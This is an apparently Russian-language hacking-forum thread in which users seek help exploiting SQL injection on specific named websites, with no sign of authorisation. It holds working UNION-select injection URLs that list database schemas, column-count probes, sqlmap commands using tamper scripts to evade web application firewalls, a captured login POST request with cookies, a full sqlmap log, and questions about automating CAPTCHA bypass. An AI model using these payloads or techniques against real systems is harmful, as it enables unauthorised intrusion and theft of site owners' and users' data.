Ребят помогите раскрутить Code: http://trafficswirl.com/teamsplash.php?tid=1%27 Ни как мне эта скуля не дается(( с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может( либо я дурак либо лыжи правда не едут.... уязвимость раскручивается точно знаю, только как?(
Code: http://trafficswirl.com/teamsplash.php?tid=-1'+union+select+schema_name,2+/*!From*/+information_schema.schemata+--+sp В ссылках вывод
Можно попробовать обойти ваф набором тамперов. https://github.com/sqlmapproject/sqlmap/tree/master/waf
Часто стал натыкаться на сайтах на "Защиту от роботов" в основном рекапча её как то можно обойти? Даже если через сторонний сервис чекать, то как автоматизировать с тем же к примеру sqlmap
Кручу уязвимость: Code: http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%27%22&_a=viewCat_new раскручиваю через --dbms=MySQL --risk=3 но чет какая то лажа выходит( реально ли такое раскрутить?
PHP: http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1)+group+by+1,2,3,4,5,6+--+-&_a=viewCat_new допустим реально. Там W.A.F. Крутите.
веб апликатион фаерволл Да, да крутите, используя тамперы, просто так его sqlmap не раскрутит, ищите для этого другой сайт. У вас 2 варианта: 1)задрочить тампер скрипты. 2) крутить руками. Гуглить sql wafbypass. итд
Не как не могу раскрутить SQL njection через POST запрос в авторизацию Spoiler: Фото Spoiler: Отчёт Code: POST /dokument/full-manual/developers/admin/js/?errauth=blocked_30_min HTTP/1.1 Content-Length: Content-Type: application/x-www-form-urlencoded Referer: http://www.site.ru:80/ Cookie: SESSdc0003b8d793c3d72e49c242aa69e1d4=i8hjlikb619hfca2bb9e62qr56; _ym_uid=1472824047791009073; _ym_isad=2; _ym_visorc_2170150=w Host: www.site.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms Spoiler: Отчёт от мампа Code: sqlmap -u www.site.ru/dokument/full-manual/developers/admin/js/?errauth=blocked_30_min --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --dbs --level=2 --risk=2 --string --tamper=space2comment _ ___ ___| |_____ ___ ___ {1.0.9.1#dev} _ -| . | | | .'| . | ___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org !] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applic le local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program *] starting at 17:04:23 17:04:23] [INFO] testing connection to the target URL qlmap got a 302 redirect to 'http://www.site.ru:80/BASE_PATH_HREF?errauth=blocked_30_min'. Do you want to follow? [Y/n] Y edirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y 17:04:42] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests 17:04:42] [INFO] testing if the provided string is within the target URL page content 17:04:42] [WARNING] you provided '--tamper=space2comment' as the string to match, but such a string is not within the target URL raw response, sqlmap will arry on anyway 17:04:43] [WARNING] heuristic (basic) test shows that POST parameter 'name' might not be injectable 17:04:44] [INFO] testing for SQL injection on POST parameter 'name' 17:04:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' 17:05:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)' 17:05:18] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' 17:05:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' 17:05:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' 17:05:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace' 17:05:39] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)' 17:05:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' 17:05:41] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause' 17:05:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' 17:05:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' 17:05:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' 17:06:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' 17:06:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' 17:06:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)' 17:06:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' 17:06:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' 17:06:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' 17:06:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' 17:07:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' 17:07:09] [INFO] testing 'PostgreSQL error-based - Parameter replace' 17:07:09] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)' 17:07:10] [INFO] testing 'MySQL inline queries' 17:07:11] [INFO] testing 'PostgreSQL inline queries' 17:07:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' 17:07:12] [INFO] testing 'Oracle inline queries' 17:07:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' 17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries' 17:07:27] [INFO] POST parameter 'name' appears to be 'MySQL > 5.0.11 stacked queries' injectable t looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n or the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] n 17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' 17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' 17:08:51] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)' 17:08:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind' 17:08:52] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace' 17:08:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' 17:08:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found 17:09:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns' 17:09:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' 17:09:33] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns' 17:09:46] [INFO] checking if the injection point on POST parameter 'name' is a false positive 17:09:47] [WARNING] false positive or unexploitable injection point detected 17:09:47] [WARNING] POST parameter 'name' is not injectable 17:09:47] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try o rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect t t there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment') *] shutting down at 17:09:47 Помогите пожалуйста очень надо
